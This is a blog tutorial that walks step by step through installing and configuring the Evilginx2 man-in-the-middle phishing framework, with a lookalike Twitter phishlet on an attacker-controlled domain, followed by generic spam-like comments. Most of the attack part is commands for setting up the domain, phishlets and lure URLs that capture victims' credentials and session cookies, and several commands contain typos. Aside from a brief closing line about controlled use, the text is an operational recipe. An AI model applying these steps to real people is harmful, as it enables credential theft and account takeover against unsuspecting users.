This is the successor of Evilginx 1, and it stays in-line with the MITM lineage. This tool is designed for a Phishing attack to capture login credentials and a session cookie.
Table of Content Overview
Setup
Perquisites
Installation
Domain Setup
Priming Evilginx
Execution
Lure Creation
Attack Simulation
Overview
One of the biggest concerns in today’s cyberspace is phishing, one of the things that a user uses that is familiar against them. This is a MITM attack framework that sits between the user and the site that they are trying to use to potentially steal their credibility. The framework is written in GO and implements its own HTTP and DNS servers, making the setup process a breeze.
Setup
Let’s get acquainted with Evilginx2. The first thing we need to do is setup the Evilginx2 application on our attacking machine, let’s get the IP.
|
1
|
#ifconfig
|
Perquisites
Evilginx has a few requirements before it can be installed and start working optimally, let’s take of them first.
We use pscp to upload the go install file to our attacking machine, defining where it can find the file and the credentials and IP of the destination machine. Go is a prerequisite for setting up evilginx. You can get Go 1.10.0 from here.
|
1
|
pscp.exe c:\go1.10.linux–amd64.tar.gz root@68.183.85.197:/tmp/go1.10.linux–amd65.tar.gz
|
Once we have to Go in our machine we unpack and install it. Pscp deposited our Go file in the tmp folder. We will now be using the following commands to install Go and check its version:
|
1
2
3
4
5
6
|
#cd /tmp/
#ls
#tar –C /use/local –xzf go1.10.linux–amd64.tar.gz
#export PATH=$PATH:/use/local/go/bin
#source $HOME/ .profile
#go version
|
Go needs to be added to ~/.profieles now, here’s how you do it:
Open the. profiles file in nano or any other text editor and type in the following
|
1
2
|
#export GOPATH=$HOME/go
#export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
|
Next, install git make by typing the following:
|
1
|
#apt–get install git make
|
Installation
Now we are ready to install Evilginx, let’s see how.
|
1
2
3
4
|
#go get –u github.com/kgretzky/evilginx2
#cd $GOPATH/src/github.com/kgretzky/evilginx2
#make
#make install
|
Let’s launch Evilginx by running the script.
|
1
|
#../evilginx
|
There is multiple built-in options that the attacker can utilize to choose a site template called Phishlets.
Domain Setup
Evilginx works as a relay between the victim and the legitimate website that they are trying to access, to achieve this, the attacker needs a domain of their own. There are plenty of resources on the web from where a free domain can be attained temporarily, we used one such resource. We have setup an attacking domain: userid.cf.
The IP of our attacking machine is used in the IP address for the nameserver, if you recall, we noted it earlier on in the process.
Priming Evilginx
This is the part where we prime Evilginx for the attack. At the Evilginx terminal, we use the help command to see the various general configuration options that it has.
|
1
|
help
|
We need to configure Evilginx to use the domain name that we have set up for it and the IP for the attacking machine.
|
1
2
|
#config domain userid.cf
#config ip 68.183.85.197
|
Time to setup the domains. We have used the twitter phishlet with our domain and Evilginx gives us options of modified domain names that we can setup in our hosting site
|
1
2
|
#phishlets hostname twitter twittwer.com.userid.cf
#phishlets get–hosts twitter
|
In our hosting site, we set the A record, which will the IP of the attacking machine and then copy and paste the domain names provided by Evilginx. One thing to note here, we don’t need to copy the “userid.cf” part, we just need the preceding string.
Execution
We now have everything we need to execute a successful attack using Evilginx.
The settings have been put into place, now we can start using the tool for what it is intended
|
1
|
#phishlets enable twitter
|
Lure Creation
We now need a link that the victim clicks on, in Evilginx, the term for the link is “Lures”.
The help command shows us what options we must use for setting up the lures.
|
1
|
#help lures
|
The lures have to be attached with our desired phishlet and a redirect has to be set to point towards the legitimate website that we are trying to harvest credentials for. Once the lures have been configured, we can see what the configurations yield.
|
1
2
3
4
5
|
#lures
#lures create twitter
#lures edit redirect_url 0 =’https://www.twitter.com’
#lures
#lures get–url 0
|
Attack Simulation
When a victim clicks on our created lure, they will be sent to out phishlet, as can be seen below.
The victim enters their credentials and we see Evilginx2 capturing them and relaying them to the attack machines terminal.
This is a great tool to explore and understand phishing but at the same time, be sure to use it in a controlled setting.
Author: JDsingh is an Information Security Analyst | Pentester | Researcher Contact Here
Like!! I blog quite often and I genuinely thank you for your information. The article has truly peaked my interest.
Like!! Great article post.Really thank you! Really Cool.
It’s in fact very difficult in this full of activity life to listen news on TV,
thus I simply use internet for that reason,
and take the newest news.
Hey there are using WordPress for your site platform? I’m new to the
blog world but I’m trying to get started and set up my own. Do you require any html coding expertise to make your own blog?
Any help would be really appreciated!
I don’t even know how I finished up here, however I assumed this post
was good. I don’t recognise who you might be but certainly you’re going
to a famous blogger when you are not already.
Cheers!
I visited several sites however the audio quality for audio
songs current at this web site is genuinely excellent.
My brother suggested I might like this blog. He was totally right.
This post truly made my day. You cann’t imagine simply how much time I had
spent for this info! Thanks!
Greetings! This is my 1st comment here so I just wanted
to give a quick shout out and tell you I genuinely enjoy reading through your posts.
Can you recommend any other blogs/websites/forums that go over the
same topics? Appreciate it!
Great post however , I was wanting to know if you could write a litte more on this topic?
I’d be very thankful if you could elaborate a little bit more.
Many thanks!